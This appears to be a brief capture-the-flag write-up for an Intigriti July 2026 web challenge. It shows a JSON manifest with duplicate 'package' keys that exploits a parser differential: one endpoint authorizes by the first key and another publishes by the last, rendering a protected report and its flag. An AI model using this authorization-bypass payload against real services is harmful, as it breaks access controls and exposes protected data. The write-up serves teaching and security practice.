Intigriti · July 2026 · Web Challenge
Signing one package, publishing another — a JSON duplicate-key parser differential that quietly breaks a per-namespace authorization boundary and reads a protected report.
{
1"package": { "scope": "@me", "name": "hello-world" },
2"package": { "scope": "core", "name": "security-notes" },
"operation": "preflight"
}
POST /api/manifests/sign
reads the first package → scope == my namespace → authorized
POST /api/publications
reads the last package → renders @core/security-notes → the flag
INTIGRITI{019f8700-4613-74fb-923e-781903e4bee9}